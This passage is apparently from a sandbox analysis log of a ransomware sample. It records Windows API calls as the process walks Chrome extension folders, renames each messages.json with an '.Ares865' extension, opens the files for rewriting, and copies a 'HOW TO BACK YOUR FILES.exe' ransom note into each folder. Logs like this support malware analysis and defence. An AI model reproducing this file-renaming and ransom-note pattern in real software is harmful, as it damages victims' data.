[0102.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.540] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.Ares865") returned 162 [0102.540] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.542] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.545] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr" [0102.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr" [0102.545] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.545] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.545] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.546] GetLastError () returned 0x0 [0102.546] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb1af60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb1af60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.546] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.546] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.546] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.Ares865") returned 162 [0102.546] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.551] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th" [0102.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th" [0102.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.552] GetLastError () returned 0x0 [0102.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb410c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb410c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.553] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.553] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.Ares865") returned 162 [0102.553] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.557] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.563] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv" [0102.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv" [0102.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.564] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.564] GetLastError () returned 0x0 [0102.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb410c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb410c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.565] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.565] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.Ares865") returned 162 [0102.565] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.569] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.572] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr" [0102.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr" [0102.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.573] GetLastError () returned 0x0 [0102.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb410c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb410c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.573] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.573] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.Ares865") returned 162 [0102.574] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.578] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl" [0102.578] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl" [0102.579] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.579] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.579] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.580] GetLastError () returned 0x0 [0102.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb410c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb410c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 